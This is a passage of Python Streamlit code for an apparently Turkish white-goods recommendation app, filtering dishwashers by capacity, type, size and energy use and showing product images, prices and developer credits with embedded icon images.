Image.open(requests.get(data3.image[6], stream=True).raw).resize((100,150)) im8 = Image.open(requests.get(data3.image[7], stream=True).raw).resize((100,150)) im9 = Image.open(requests.get(data3.image[8], stream=True).raw).resize((100,150)) im10 = Image.open(requests.get(data3.image[9], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.markdown(data3.brand[0]) b6 = st.image(im6, width=120) st.markdown(data3.brand[5]) with col2: b2 = st.image(im2, width=120) st.markdown(data3.brand[1]) b7 = st.image(im7, width=120) st.markdown(data3.brand[6]) with col3: b3 = st.image(im3, width=120) st.markdown(data3.brand[2]) b8 = st.image(im8, width=120) st.markdown(data3.brand[7]) with col4: b4 = st.image(im4, width=120) st.markdown(data3.brand[3]) b9 = st.image(im9, width=120) st.markdown(data3.brand[8]) with col5: b5 = st.image(im5, width=120) st.markdown(data3.brand[4]) b10 = st.image(im10, width=120) st.markdown(data3.brand[9]) elif any([i != " " for i in soru_list2]): for m in soru_list2: if m == " ": pass else: m_index = soru_list2.index(m) len_lst1.append(soru_list1[m_index]) len_lst2.append(m) for k in range(0,len(len_lst2)): dataf = dataf[dataf[len_lst1[k]] == len_lst2[k]] if len(dataf) == 0: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulunamadı") elif len(dataf) == 1: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulundu") dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) elif len(dataf) == 2: st.title("Seçilen Kriterlere Uygun İki Ürün Bulundu") col1, col2 = st.columns([1,1]) dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf.brand[1]) st.title("Fiyat") st.title(dataf.price[1]) elif len(dataf) == 3: st.title("Seçilen Kriterlere Uygun Üç Ürün Bulundu") col1, col2, col3 = st.columns([1,1,1]) dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(dataf.image[2], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf.brand[1]) st.title("Fiyat") st.title(dataf.price[1]) with col3: b3 = st.image(im3, width=120) st.title(dataf.brand[2]) st.title("Fiyat") st.title(dataf.price[2]) elif len(dataf) >3: st.title("Seçilen Kriterlere En Uygun Ürünler") ucuz = dataf.sort_values(by="price", ascending=True).reset_index() fp1 = dataf[dataf["puan"] > dataf["puan"].quantile(0.25)].sort_values(by="puan", ascending=False).reset_index() fp1 = fp1.drop(["index"],axis=1) fp2 = fp1[fp1["price"] <dataf["price"].quantile(0.75)].sort_values(by="puan", ascending=False).reset_index() fp2 = fp2.drop(["index"],axis=1) fp3 = fp2.sort_values(by="puan", ascending=False).reset_index() fp3 = fp3.drop(["index"],axis=1) if len(fp3.puan) == 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp3.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif len(fp3.puan) == 1: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp1.full_name[0] ) st.markdown("Fiyat : " + str(fp1.price[0]) ) elif len(fp3.puan) > 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif machine =="Bulaşık Makinesi": capacity_options = [' ','Düşük Kapasite','Orta Kapasite', 'Yüksek Kapasite'] capacity_help = '''Düşük kapasite: 12 Kişilik ve Altı , Orta Kapasite: 13 Kişilik, Yüksek Kapasite: 14 Kişilik ve Üstü'''.strip() capacity = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin kapasitesi ne kadar olmalı?',options=capacity_options,help=capacity_help) type_options = [' ',"Solo","Ankastre"] type_help = '''Kullanım Tipi'''.strip(",") type_ = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin kullanım tipi nasıl olmalı?',options=type_options,help=type_help) size_options = [' ',"Küçük boyut","Standart Boyut","Standard üstü"] size = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin büyüklüğü ne kadar olmalı?',options=size_options) energy_usage_options = [' ','Çok önemli', 'Önemli', 'Az önemli', 'Önemsiz'] energy_usage_help = '''Çok Önemli: A+++ A++, Önemli : A+ A, Az Önemli: B C, Önemsiz: D E F G)'''.strip() energy_usage = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin tükettiği enerji miktarı sizin için önemli mi?',options=energy_usage_options,help=energy_usage_help) box_options = [' ',"Sepetli","Çekmeceli"] box_help = '''Çatal Kaşık Bölmesi Tipi'''.strip(",") box = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin çatal kaşık bölmesi nasıl olmalı?',options=box_options,help=box_help) soru_list = [capacity,type_,size,energy_usage,box] soru_list1 = ["capacity","type_","size","energy_usage","box"] soru_list2 = [capacity,type_,size,energy_usage,box] if all([i == " " for i in soru_list2]): st.title('Bakalım sizin için nelerimiz var?') col1, col2, col3, col4, col5 = st.columns([1,1,1,1,1]) data2_b = data2_b[data2_b.image != "YOK"] data3 = data2_b.sample(frac=1).drop_duplicates(['brand']).sample(10).reset_index() im1 = Image.open(requests.get(data3.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(data3.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(data3.image[2], stream=True).raw).resize((100,150)) im4 = Image.open(requests.get(data3.image[3], stream=True).raw).resize((100,150)) im5 = Image.open(requests.get(data3.image[4], stream=True).raw).resize((100,150)) im6 = Image.open(requests.get(data3.image[5], stream=True).raw).resize((100,150)) im7 = Image.open(requests.get(data3.image[6], stream=True).raw).resize((100,150)) im8 = Image.open(requests.get(data3.image[7], stream=True).raw).resize((100,150)) im9 = Image.open(requests.get(data3.image[8], stream=True).raw).resize((100,150)) im10 = Image.open(requests.get(data3.image[9], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.markdown(data3.brand[0]) b6 = st.image(im6, width=120) st.markdown(data3.brand[5]) with col2: b2 = st.image(im2, width=120) st.markdown(data3.brand[1]) b7 = st.image(im7, width=120) st.markdown(data3.brand[6]) with col3: b3 = st.image(im3, width=120) st.markdown(data3.brand[2]) b8 = st.image(im8, width=120) st.markdown(data3.brand[7]) with col4: b4 = st.image(im4, width=120) st.markdown(data3.brand[3]) b9 = st.image(im9, width=120) st.markdown(data3.brand[8]) with col5: b5 = st.image(im5, width=120) st.markdown(data3.brand[4]) b10 = st.image(im10, width=120) st.markdown(data3.brand[9]) elif any([i != " " for i in soru_list2]): for m in soru_list2: if m == " ": pass else: m_index = soru_list2.index(m) len_lst1.append(soru_list1[m_index]) len_lst2.append(m) for k in range(0,len(len_lst2)): dataf_b = dataf_b[dataf_b[len_lst1[k]] == len_lst2[k]] if len(dataf_b) == 0: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulunamadı") elif len(dataf_b) == 1: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulundu") dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) elif len(dataf_b) == 2: st.title("Seçilen Kriterlere Uygun İki Ürün Bulundu") col1, col2 = st.columns([1,1]) dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf_b.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf_b.brand[1]) st.title("Fiyat") st.title(dataf_b.price[1]) elif len(dataf_b) == 3: st.title("Seçilen Kriterlere Uygun Üç Ürün Bulundu") col1, col2, col3 = st.columns([1,1,1]) dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf_b.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(dataf_b.image[2], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf_b.brand[1]) st.title("Fiyat") st.title(dataf_b.price[1]) with col3: b3 = st.image(im3, width=120) st.title(dataf_b.brand[2]) st.title("Fiyat") st.title(dataf_b.price[2]) elif len(dataf_b) >3: st.title("Seçilen Kriterlere En Uygun Ürünler") ucuz = dataf_b.sort_values(by="price", ascending=True).reset_index() fp1 = dataf_b[dataf_b["puan"] > dataf_b["puan"].quantile(0.25)].sort_values(by="puan", ascending=False).reset_index() fp1 = fp1.drop(["index"],axis=1) fp2 = fp1[fp1["price"] <dataf_b["price"].quantile(0.75)].sort_values(by="puan", ascending=False).reset_index() fp2 = fp2.drop(["index"],axis=1) fp3 = fp2.sort_values(by="puan", ascending=False).reset_index() fp3 = fp3.drop(["index"],axis=1) if len(fp3.puan) == 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp3.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif len(fp3.puan) == 1: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp1.full_name[0] ) st.markdown("Fiyat : " + str(fp1.price[0]) ) elif len(fp3.puan) > 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) if dil_secenek == "EN": if machine ==" ": col1, col2, col3, col4, col5,col6,col7,col8,col9,col10,col11,col12 = st.columns([1,1,1,1,1,1,1,1,1,1,1,5]) with col12: if dil_secenek == "EN": button = st.button("Like 👍") if button: st.write("Appreciated 💗") file1 = open("counter.txt","r") count = file1.read() count_int = count.replace("'","") count_int = int(count_int) + 1 with open('counter.txt', 'w') as f: f.write(str(count_int)) st.title("About") st.markdown("With <b><i> Customer Recommendation Project</i></b>, we aim to help consumers choose best white goods for them.", unsafe_allow_html=True) st.markdown("People expect the e-commerce websites they engage with to remember who they are and what they’re interested in, and make relevant, individualized, and accurate recommendations for new content and new products based on their previous activities. Any app or website that fails to deliver on these demands will quickly see its users flocking out the digital door.") st.markdown("Customer recommendation system is a software tool designed to generate and provide suggestions for items or content a specific user would like to purchase or engage with based on their needs.") st.markdown(" ") st.title("Project Developers") st.markdown(" ") col1, col2, col3, col4, col5,col6,col7 = st.columns([1,1,1,1,1,1,1]) with col1: st.markdown("<b><i>Mert Türkyılmaz</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAAXNSR0IArs4c6QAAEWtJREFUaEPVWXl019WV/3zuNyF7AgFCAgmIyhoWBRcCilqhajvWDeiMSyuIOi1dXOrYOq069rTO6bRje7pbDNa6VMClteJSC1XZBBTZt0QgCSQkIRASyPq9nzkvUQ4JUJdO/+g7h3M437zfe+/z7r2fe+/nEf/kg//k58c/FMAtL6xJbW9uuwCmooYYD2ZGNg2u/q62YkNCHB3o0fDwrWe1/T2X+P8O4Kb5y89pS4hKo9hvE5lEoMSEBFFXOxSb+BhMfQnbH8Vtr8eWMDaOsOHRq4p2fRIgnxjArD8szVBbNJNCdoLai9uYcDMN7QRiCec6vJaKKgkNh5AjQwkdo2H6vYAKgBNNOCJgfYP0bF+0RA0JPVJ/d/Wk6o8D5GMDuP9+WdnoFTMVczYjbJE0mFSC3P5q9N6C9SbQKikZxFCSqyANk9sRmL8AcKyEmSR+ASgCsFvA5yH2AfGTedOKHvqHAZg+f36UYfkvgFaDGP1EXUjDk3TUyDBQMdJItIsaCHAbnamghot4DcB7dE6GxSMFWyEoj87+MLWA1mqKF0sBJBLN8frc6UV//ShAPrIFvjB/+YAE41fdcboZPgvgHQjvwpgOVwagLICtoNQB0L3IxfUW4U+SCgG7HK7tZnIXz5C42+jtIPoAWAm3QTDvKdmvYVqHKKpJjGz/w5efdeRvAflIAGYuWP4vlN0k+lnhhkF7Q5II9hA03KAyd2aaYY8cwxxsoukZgqmS/l2GfRbzgOhnEDgE49sQCgFVCDwAcLzkJSRySTYiRptMCQSa0lIPXvXTz3ym5WQgPhTATQtXXC4pMMoZAF42eAS3DBkKCB1050EaGwHvKWCgga8K2ALgxuD7MG50aSCBfDiXEkgPLCTYYoMPcWE8yVSHdhpY6dJgI3pL9qM44o8SY01Vj/Y3iq84b++JQJwUwA2PrUtLSD1yCxyX01ADMAY0SpCFhQxc60BMKQ3AOJi9DfgrEIskXE9qm5PNJhVKrO2wgjBG8ldBa6QwRUA7qXSB7XSUyjACjo2MuBCODTKdYa6dIk6h45FHZkys6w7ipABmLVx+F8mhilnwfuAJUhLNXoHUkp3So399S9uouB1rEWGpHIF9viSL2+lcD6BA4EBSlQCyBVYb/M+AfVpANhC+sy+kwD5HHKgmbAngRQTaBNQBlmfCXNDrCjYWPXr//fSPBODL85ekN0UpPwQwRu6nGJkgaDdg60/LTu1/89lDJuekJ6e2xd76Rmn14ic27CwAMJTOd52qNvIcQT0BNhBIAfQ7OvPdNJViKYiQfYcASAbQLPDJQKmEzpaQCTKV0CGAiYLeMkbFUY9oCZqQ+PCMs+qPBXFCC8xcsGK2DDebMASSA3zDDUcsZtr3Lx1zSb+MlJQPFpGAB/+6sa60tnELTL0AnI6O22OSS8tJ7uyMB+wXtc2AfImnkUiC4zVG2CVpIoR+IDKkQGOqM6AHwKdBlodgFvzfKL7+yPSiu08KICSp8sIV14j8jqBCkWtM2EUoycGBOek91vz3JeNu7m7G5zdV1L+wtewQZIc79u+IET0r8HLIBsqwhe5Nwa1ADCJY7sBSOkaKGECi3/trRgj0Jm6iYbGEDdbJdPdBWC9y9bzpE+45OYAlSxIqDqRcJPc5DuTT2YyAni7SXo7Mxv7sc2dd2yOyhGMXefydnWsXl+6roPkwKFoEem+E7ArsFa2S7n1A5ndSLxY5kUlxFKmQA0JgZgBMk9BAYj7EBkBrAFwv4nQDVgrcZM6nPamtJcGSD36QH45zoRsXvHW+QX+EtEadLrGEChkVfRzq+enT88791zGDssjOn+491LTv/r+sL4kdZZC2g/gyoFRAe+TW2nHjRAboSxFHtbB4vGQ9CYW/lQgcwhDkjhcYoTZkddAzXPwiwAjCchiLCV0IoFbQunnTJj71wQV2AXDDs8tyEhX9j2IVEKwHtQ7mF0O2V9BpEEYA7DE8J2PLmXnZVt3QrDd3V9e1O54VdRWEC4LFAJSEYCQxKPA7hM0EzgLYk4QArwHsIIBcOfaZ+Zvuli/z/aboSsCzRByCsxyGTAgicUjA0xA3ktGG4mlnvxdAdAEwe+HKMS7MFNQow2CTst15xAxDQ5CJKodUBzJYpjG4A8E8h75CMJFAqZPVVJwPMIvAOoflAB4YJ2zWBFmbqFoIqSRegjBADOW1cgArELSGbvtp6OdSL0KlJAe5o4zkEhH71ND02KMzLwru3RVAoM+WKPk2l64lsKYj49KLjGyMpa0Ue6clRa0JCbbWiIrm1niOwFPa4rgqlvZQyDRjdkpiwgEQLRCGC4ia27wl9jgO1iPRIGJpsqGhJcZlgFoA5nZmYiyScyBMpxNsd6mMwNiwBs12USoHUFU8rejrXV1I4qxnV8yCcDOhdxxspfNCGU4TsTmKUetAyuBeaQ3fmTL6c91Z6NXtlYee3hD6EbYU9s1qumPyiIHHzvnxsi2H9hxqzrxyxIC6MXm9ElMTo/TIjM1t7dp98HC8qbr+Ly9uqdwCabJTeWbc7jFppvfJQv0BbhSU3mF1RpsfuebcF49aYPr85SnpxMXWETAoFjgR8GaIOyTmkNhB8vVTs9PH3XNR4Re6A3h5e2XT/PW7D1CoGd4vc8Bdk0cGdjk6nt9c0XTZ0LyEpIQo8WRF2YqymubfrC7Z2ZmFLcngWwEb5FIOobyQ/AQuBANDAZHwi7nTJqw/GgOzn1k5weU/BnCmhAMdGxFbKFsMqo8cnyromVr/X1PHTOp+iMUlVfueWLerVML4UblZe+84b8TgY+c44BZSw4eMX7+1/eCqsro1IBooJMFCZas+cG4h0CjTAABHAM6ZN63oraMW+NITb/ZqSYreIfmaS9MB7CD0BmTJYKAvbiRceRnpI7776TFjjnOhHZUHf79uVwtgxePyek3+yqShx4H84DfucLMTg9lcfbDyh29sXt05l1MobpJxA4BJgFJIL4PsIIEdh7z8rgUzZsQdFrhx4fLh5q6BfdtKy/enhCzcE/RxUGAW7nBoPJz1+T1TMh6YOrawO4DVFbWrfrWy5E1QNxf2y6q947yRp3afs3Zv3YFF2yt/UFrTcEVuZsrI2WefmnZqdkZoKY+Oprb25q+8sGY9xR6ANop+CmSFEPaB2glnPzesQkPz7cexUOi4ItocWnw+QqsnvidjATvSp6ogDs3LSE783iVn9O1+uD+XVO1/at2uA4Be/NTg3MTrxw3+8rFzmtviw7e/+Pa81tiv62B0ug3ITKt6YOqYod3X+tof1jx/pL2tt4Ph4M2g9sIZOreOZorUTXGcsPjRGedUHXWh8J+ZC1ecS2gOgPHvLzpIsAoiTu3gZ3LFoMyU5vumjLmo+6bLdtdsfGRNyQKK7aPzel5726ThXay0qry2/lerSoK5KWA/oHoC7Q99dvzozOQeqceud+eid+oPNLVGhIdOLfwLlS4kNFGoQoTtov1m3tXnLu4CYNaCld8B/EbR2oK/gZ5KWR9BWwiWij6hX2pK7wcvPfO48mP93rrFP1m+LdTvU4b2zUi6+4KRR6vVsMlL2/YcWbix/AActTDUSn4YFvX91uQR5wzpk9nFje55eW31vsNNByVLB5BDeqXEHoQlSVrLiLWQDhVPK5p9FMD0+Rt7ZFjDLxysI3GeoMiEFHdsN2AwTKMgVAzISjnwwNQzPrDQ0Yt7dUdl/dPrdzfKcWB8fq/aOUXDQt1ydPxpa8X+5zZUbCVQL0MSwd6AMu6bMjqxICutS8749ivrqiobm3IltJBeTUT7JU8j9VrslmOm8Qa7IlDoUQCdIlXCFQaNix2hizqPxiUunWuCQCUK1is/K2XnA1PGju7uQq+VVNU8uW7nmwQGDOubOfY/JheGRuXoeHFrRe1zm/ZUiNgB12gSayT0uf384ZeO6tezy3IBQFVj0+GY2G+S4Ewm8ZSEGSBSRTyemJT40Amr0SALxsS9JFpE5lsMwjRWYBXIl0b0yWi8a/LIO7sDeP29fbt/+87O3PC9sF9mzZ3nj8zvZoGa5zaVvxeCMSh0AK4JddG9F49uGdQzrcvc/3x1bXlVQxMkc6M/7mA6wBsovA5yFeGvPDJt4toP1u/iz0GM9db20Hj/AGB/l/JothDwtS7rX5CZMuWBqWPO7A7gxW178OyG8q2h6yrM7Vlwx/nDu7jFi1v31Dy7qXyJoNEEBwN6LEguX5807LrRub26nCFYYE9j0/ORWOrQ7aRaAfs1iBGUJon8ZfE1E350QgCzFqy4jOQEwW+D8CrMVkJxf8CGCsrNTU8Z/f1Lzkg63gLVO3+7tnR/uOGR/TIKvjG5MGTMo2PRtj2Vz2woy4XxaUi7Qs0loOmBqWPi/Ky0QcfO/fHSbd/euK/uEgcDW/wcQqiHbgiND+lLHrlm4hwwkFnn6IJ+1sLVp9LbDBH7CcqRcM/7Yu2AIGKNzM0svvO8kd88DkBphwtVkhoyOq9XVXcafWVH5c75G8p+jlg3hAIRwKNBqbhj0vDPj8rt2YWFvvny2vbqwy1PgNhM4Wsh2OV824xveoLNnXflOaEiPTqOo8RO/bPgexBvBdQaJBARc43Y3D8t9RvfvWRMF/cIKwUW+v263aHWaRiWk5Fz9+TCLi3n4veqNjyxdtdIAY+bsM+pWwm2fuvCUdHpvdOzjz3QQ8u23rdh78HLaKGMZhng7QRXAvDiaybceuztH2eB8OGmZ1beAMXDxGgo5U+KdhVcl4pKys9KrXpgythhJ4qBZzaUh342YWifjJS7L+habfx5R1XJU+t3/VTEdUHoCoo0gLcfvPTMcTlpyV0mf+vld9uqDzftDworiGQCjwdVpMEznl8wY1Rr971PKKvcNH95ttO+IaqXQVeG7ElgWSKZl5OeMsSBqN19sIGHQ3pvbG2vb2hpD11VelJi9PiQ7MySmqaWWyC1Z6cmPVbZ2JRx4HDrVaLcnHtlehXgqVnJiVfmZiTPc9Hqm1pnU2qobW5RHKMXoJrQixi5J6m5/c5fXnd+Z4XcbZxUmevQRIlToNBMBAPamTLPhzgwtJwkqwgkKLR9ZD7Bd0UVK8ZVHXUL8L+w0ILyyk5JEocBe4sKva1m0LhM0lJKX5cpk0KdxECpDSBb2LnH8giJ9z58zVlB3TvhOCmAW55c06c9OR7A2K916jCF6zuaCoXGPFBbR32SA9MRk/1OwABB09jRdOAlQKci5qWdYhUqzXyrwyYE0B1BLH0W5EQ4toEIDQsBxep86GimUCHyoXnTJjx8ssOfMAaOnXzj/FW5iNoKTHZvKG/jSHOt3f4S9ByJTmg1aPsABSWhPPA1wSxJIVtPCiIAxTIQiYCPBbAAsAxBNxLcGoRigqH0bpTQK8QQoEMElrQ55jw2Y+Kev3X4DwUQJsxcsHImIu6GvC9jzgR1BMQ5oTBT5AMoSyPwDIAa0c+GWx+RpGMXTBVOjKZUEV5oIE7v0INM++Q2lkQzoCSAmYLqg6BrwFYz3jn36qIg0X/o+ND3gbDC7PlvDUaSjrS3ea9Ei1yuZAc+I3S0eNmSLjKqPYi5Luw0BjmSWbFzoBHvkD7ewUGQbyOsIKgQoO99/12sd3joo0MifzZv2rmPdqfKT+xC3X/Y+WZw+HN07YoSEvbH7rNc+oIRaQT/GDNsrRR6qOFZ51AjTONCi2rO0EiOFVkCeSbRUSAepocXH6yW2u6fN2NyzYde+UdloRMt9NVFi5J6r7qs7f77oFkL3npJ1HAQy2j2A3r79MBU3vHuZQUdIhbR5jFqaRpJoRJiEoghnW7IlZ1g7btzZ0x4++Me/IP5H8mFui/eIYAl9DglZmvFo1dddPCLzy07zeLoYoOvdtrPCb0CaD3AfLlPoUUHIR8W+msJ+yQWN6JsW2jKP+nB/y4A3TedNX/psOIZ520L30M9BcWnk14Tyt6ZC1Ze0aiyP6UgP/ejsMrHBfSJLPBxN/lHzv+nB/B/jzziqZ3jZRgAAAAASUVORK5CYII=)](https://www.linkedin.com/in/mertturkyilmaz/)") st.markdown("[![Foo](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAAXNSR0IArs4c6QAACepJREFUaEO9WntwXFUZ/33n7gZM7i6ltLaCQ4Vm76ZFaiHdu03Loz6YIgoyQCl1KIijlKEgICD44ik4aEEoDo8OKoLQVuAPEYHBUQsI7e4mlJelu5tWqli0BJjsvUnaZO/5nHN2b9gke7ObNOH+leSc8zvf73ud73wnhAn4mo5IzqCwXALGQiJqYYkjIXg6MTUBICZ2wegCaCcEZYXkLV6Y/9azLfPf/d2exgsQnds2VRblCgavFICtBB0zFiNDhIdYYL2zPf3+mNePZ9PG+OJDDW/gSklYJQhKw/v9SUaPIKzzKLymN/vS7rEA1q+11tZwpGBcLoHrRwrOfUz8IrF4niC3kuSckOj6cGdHtxJmanMy6pE3jQVZzJjPTEsgcDwxGiuF1USAG52odyc6OgbqIVIXgeicZEx6vJGAY4ZsCKQE830HiIYnurIvOfVs6M+ZPneJubfYeyYTVhGjrXItE78iiqHlhR2bO2th1iQQsezTmfkhIooMgkm0s4Fr3Gz6r7U2qGfcjCc/T5JvAyHhz2dwgUic52RTfxgNY1QCEcv+FsD3AWQoECb0gul7bi51LwBZj3BjmCPMeGIVS/r5Ry7KHkAXObn0A0E4gQRKwmPdYKAzbWeWZ7mdmX+MQagxTzWbk3NJeI8DYk55MQO4MIhEVQLKbQB+fFDzwMsiZJxa2Lb5gzFLNI4FBx193MFyb/+TIBxXWs4eyDjDyW55cjjcCAI6YIuyw/d5JmxuOmDvSf97/fWeccgy7iWHHtra6DSGnoPgxZoCuCC8UOvwwB5KoLU1bDpGajDbMG2nsFj8cWl+ONuSJQZeBnGLJsGywz3MXIhNm4r+3CEEIjH7ahB+VjZbHxtsu2+1vzkEuLU1HHXFF8mT+e7Ojh3jVnHFwoNiC45UZ0TBlH8Znv/N5sRRMChdcWZc6eTSd4wgoE5YIQeyRDDVIDFfVshn1g4X0IwlTiCi5/Uc4FVmWuvkU78dR1YSEcteycBlvsWZ+UQ3n3lh+J7RmH0pE7QszOxwGJZfRw1aINJs3w6B75b8DVvd3KwE8Jg3AiyevJmZf1T5d0UEoB8yIQxmVRfNl6BpBJ7GzAQS7wmJ9yGkmpchgV4u4icQWDAEh+nmQj513UirLjPM+NtpYjpWjxGvcbKZq8tKBFRh5g14//LzLxF/uZDNPFvNPSKW/SCA8yfCdYZjSNCDPbnUBdWwoy32UpbQMjHDNQ5sOLz7jb9/qC1gWsnVBP6lHiR+xc1mWoMEjFjJhwE+dzIIAHjYyaXPC8I2YwvaiYSWjYkvdrOZezWBJiuZEtCmV+wucvPp+wNBLPt6Am6YDAJMfJ2bzdwcTCB5IRFr2VR6d7PpRaQuIyLM7+qYZPSLAxtmKtMEgURjyZuY+MeTQYDANxVymeuDsKd8Zv4Ur6FBXYIOKGXVgRlkWonlBNpQXvSCk0ufGCi8lUgwsNk/oSecBHNRCGrrzqbbA104bm8CQ8vIhLPJjCXuJKLLShE9ugYilv0MgJMnXPChgE87ufRXgpVo38CAb6VfkBmznyXC0pL/01luPvVE1Swwt20qF4t7Jk37g5uyB0Ezgq6YZix5Jp